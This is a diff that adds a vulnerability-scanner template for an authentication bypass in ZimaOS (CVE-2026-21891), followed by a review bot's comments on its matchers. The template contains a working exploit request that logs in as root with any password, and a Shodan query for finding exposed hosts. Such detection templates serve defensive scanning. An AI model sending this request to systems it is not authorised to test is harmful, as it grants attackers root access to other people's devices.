diff --git a/http/cves/2026/CVE-2026-21891.yaml b/http/cves/2026/CVE-2026-21891.yaml
new file mode 100644
index 000000000000..5dbe16cea213
--- /dev/null
+++ b/http/cves/2026/CVE-2026-21891.yaml
@@ -0,0 +1,64 @@
+id: CVE-2026-21891
+
+info:
+ name: ZimaOS - Authentication Bypass
+ author: DhiyaneshDk
+ severity: critical
+ description: |
+ ZimaOS <= 1.5.0 contains a broken authentication caused by improper password validation for known system service accounts in the login function, letting attackers authenticate with any password for these accounts, exploit requires knowledge of common usernames.
+ impact: |
+ Attackers can gain authenticated access to system service accounts without valid passwords, potentially compromising the system.
+ remediation: |
+ Update to a fixed version when available or apply patches to properly validate passwords for system service accounts.
+ reference:
+ - https://github.com/IceWhaleTech/ZimaOS/security/advisories/GHSA-xj93-qw9p-jxq4
+ - https://nvd.nist.gov/vuln/detail/CVE-2026-21891
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L
+ cvss-score: 9.4
+ cve-id: CVE-2026-21891
+ cwe-id: CWE-287
+ epss-score: 0.00059
+ epss-percentile: 0.18386
+ cpe: cpe:2.3:o:zimaspace:zimaos:*:*:*:*:*:*:*:*
+ metadata:
+ verified: true
+ max-request: 1
+ shodan-query: html:"ZimaOS"
+ product: zimaos
+ vendor: zimaspace
+ tags: cve,cve2026,zimaos,auth-bypass,broken-auth
+
+http:
+ - raw:
+ - |
+ POST /v1/users/login HTTP/1.1
+ Host: {{Hostname}}
+ Accept: application/json, text/plain, */*
+ Content-Type: application/json
+ Origin: {{RootURL}}
+ Referer: {{RootURL}}/
+
+ {
+ "username": "root",
+ "password": "anything"
+ }
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "success"
+ - "username"
+ - "created_at"
+ condition: and
+
+ - type: word
+ part: content_type
+ words:
+ - "application/json"
+
+ - type: status
+ status:
+ - 200
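Review bot: The body matcher is the only thing separating a bypassed login from a rejected one, and the word `"success"` is a weak discriminator on its own since many JSON APIs echo a `success` key on failure responses too; `"username"` and `"created_at"` tighten it, but for a critical auth-bypass it is worth confirming against a patched build (or an account with a real password) that a rejected login does not also return those three words with 200, and if it does, add a `negative: true` word matcher for the rejection message or match on the session/token field the successful response carries. The advisory describes the flaw as affecting "known system service accounts" and the template probes only `root`; if the advisory lists other affected usernames, a short comment above the request naming why `root` was chosen (or a payload list over the affected accounts) would document the coverage. The remediation text says "Update to a fixed version when available" — if the advisory names the fixed release, cite it so operators can verify their version. Note that this template performs a live authentication as root against the target, so a comment flagging it as an intrusive check would help operators scheduling scans.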